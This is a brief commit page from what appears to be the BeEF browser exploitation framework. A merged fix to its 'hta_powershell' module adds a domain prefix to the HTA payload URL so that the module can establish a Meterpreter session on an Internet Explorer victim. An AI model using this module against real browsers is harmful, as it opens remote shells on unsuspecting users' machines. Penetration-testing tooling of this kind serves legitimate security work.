Merge pull request #1125 from ReliaQuest-Labs/master
Fixed hta_powershell module so that it can establish a meterpreter session.
This commit is contained in:
@@ -6,7 +6,7 @@
|
||||
|
||||
beef.execute(function () {
|
||||
|
||||
var hta_url = '<%= @ps_url %>' + '/hta';
|
||||
var hta_url = '<%= @domain %>' + '<%= @ps_url %>' + '/hta';
|
||||
|
||||
if (beef.browser.isIE()) {
|
||||
// application='yes' is IE-only and needed to load the HTA into an IFrame.
|
||||
|
||||
Reference in New Issue
Block a user